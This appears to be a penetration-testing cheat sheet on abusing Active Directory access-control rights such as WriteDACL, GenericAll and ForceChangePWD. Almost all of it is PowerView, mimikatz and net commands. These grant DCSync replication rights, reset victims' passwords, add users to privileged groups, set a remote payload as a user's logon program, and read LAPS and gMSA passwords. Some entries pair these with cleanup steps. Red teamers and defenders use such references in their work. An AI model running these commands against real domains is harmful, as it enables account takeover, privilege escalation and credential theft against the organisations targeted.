Skip to main content

Security Descriptors

WriteDACL​

info

Add ACE for the DACL of an object.

Abuse

Add-ObjectACL -PrincipalIdentity <user> -Rights DCSync

Cleanup

Remove-DomainObjectACL

ForceChangePWD​

info

Change the password without knowing the current password.

Abuse

mimikatz lsadump::setntlm

1 - Connect as the user with ForceChangePWD right (OPTIONAL)

$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $SecPassword)

2 - Change the password of victim

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

AddMembers​

info

Add a user, group or computer to a group.

Abuse

net group '<group>' <user> /domain /add
Add-DomainGroupMember -Identity '<group>' -Members <user>

Cleanup

net group '<group>' <user> /domain /delete
Remove-DomainGroupMember -Identity '<group>' -Members <user>

GenericAll​

info

Full control over user and group objects.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

GenericWrite​

info

Write any property of an object.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

WriteOwner​

info

Change the owner of an object.

Abuse

Set-DomainObjectOwner -Identity <vicitim> -OwnerIdentity <controlled_user>

Cleanup

Set-DomainObjectOwner

AllExtentedRights​

info

Ability to perform any "extended right" function.

If the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All are set on the domain object itself the DCSync perm can be granted.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Add-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose

Over a computer

Get-DomainComputer <computer_name> -Properties samaccountname,ms-mcs-admpwd
$gmsa = Get-ADServiceAccount -Identity '<user>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp # DSInternals module

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

References​